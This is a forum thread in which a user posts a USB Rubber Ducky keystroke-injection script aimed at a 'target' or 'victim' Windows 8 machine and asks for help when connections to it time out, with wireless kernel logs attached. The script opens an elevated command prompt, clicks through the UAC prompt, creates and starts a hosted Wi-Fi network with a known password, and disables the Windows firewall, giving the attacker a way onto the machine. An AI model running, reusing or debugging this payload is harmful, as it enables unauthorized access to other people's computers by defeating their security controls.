Duck creates wireless network for 'involuntary backups' but I cannot connect to it!

[michael_kent123]

Hello,

I have a problem with the following ducky script.

DELAY 3000
GUI r
DELAY 2000
STRING powershell Start-Process cmd -Verb runAs
DELAY 1000
ENTER
DELAY 10000
LEFTARROW
ENTER
DELAY 2000
STRING netsh wlan set hostednetwork mode=allow ssid=network key=whatever
ENTER
DELAY 2000
STRING netsh wlan start hostednetwork
ENTER
DELAY 2000
STRING netsh firewall set opmode disable
ENTER
DELAY 2000
STRING exit
ENTER

I do what Darren does in "What's Up With the Duck?":

The duck script seems to work on the target machine. The network 'network' is created. However, when I connect to 'network' from my machine and enter the password, the connection always times out.

This is what a successful connection from me to my AP looks like:

[68488.324824] wlan0: authenticate with b1:cd:00:12:a7:88
[68488.332390] wlan0: send auth to b1:cd:00:12:a7:88 (try 1/3)
[68488.334924] wlan0: authenticated
[68488.338097] wlan0: associate with b1:cd:00:12:a7:88 (try 1/3)
[68488.341976] wlan0: RX AssocResp from b1:cd:00:12:a7:88 (capab=0x411 status=0 aid=2)
[68488.352677] wlan0: associated
[68488.352980] cfg80211: Calling CRDA for country: AL
[68488.362972] cfg80211: 2402000 KHz - 2482000 KHz @ 20000 KHz), (N/A mBi, 2000 mBm)
[68488.362978] cfg80211: Regulatory domain changed to country: AL
[68488.362979] cfg80211: (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp)
[68488.362981] cfg80211: (2402000 KHz - 2482000 KHz @ 20000 KHz), (N/A, 2000 mBm)

[...]

I disconnect deliberately:

[68529.914912] wlan0: deauthenticating from b1:cd:00:12:a7:88 by local choice (reason=3)
[68529.970614] cfg80211: All devices are disconnected, going to restore regulatory settings
[68529.970621] cfg80211: Restoring regulatory settings

Here is what happens when I connect to 'network'.

[69302.952696] wlan0: authenticate with 21:32:12:7a:40:42
[69302.968746] wlan0: send auth to 21:32:12:7a:40:42 (try 1/3)
[69302.970611] wlan0: authenticated
[69302.971105] wlan0: associate with 21:32:12:7a:40:42 (try 1/3)
[69302.981330] wlan0: RX AssocResp from 21:32:12:7a:40:42 (capab=0x431 status=0 aid=1)
[69302.992791] wlan0: associated
[69302.993017] cfg80211: Calling CRDA for country: AL
[69302.999402] cfg80211: Updating information on frequency 2412 MHz for a 20 MHz width channel with regulatory rule:
[69302.999408] cfg80211: 2402000 KHz - 2482000 KHz @ 20000 KHz), (N/A mBi, 2000 mBm)

[...]

I am deauthenticated involuntarily:

[69348.297397] wlan0: deauthenticating from 21:32:12:7a:40:42 by local choice (reason=3)
[69348.373035] cfg80211: All devices are disconnected, going to restore regulatory settings
[69348.373042] cfg80211: Restoring regulatory settings

I don't see any difference between a successful connection to my AP and an unsuccessful connection to the target machine. The target is a Windows 8 box.

Does anyone know why I cannot connect to 'network'. Thanks! Edited May 8, 2014 by michael_kent123

[michael_kent123]

Just to expand on the above.

I have used the ducky code successfully on one Windows 8 machine. The script creates a network which I connect to (with a Blackberry) and receive a 192.168.x.x address.

However, on another Windows 8 machine, the script also creates the network. Yet, whenever I try to connect to the network from my Ubuntu machine, I can never obtain a connection. I also try via the Blackberry but it also will not connect. It just times out / deauthenticates itself.

When the script runs on the second Windows machine, all looks fine. I see the commands being run and accepted in the Windows terminal.

Does anyone have any ideas? Why would it work on one Windows but not on the other?

[overwraith]

"Windows undocumented features". Seriously though, I have no idea.

[michael_kent123]

Perhaps I am missing something obvious.

I run the script on the target. This creates the new wireless network. On my machine, I disconnect from whatever network I am connected to. I then connect to the new wireless network created on the victim machine.

Is this correct? Thanks.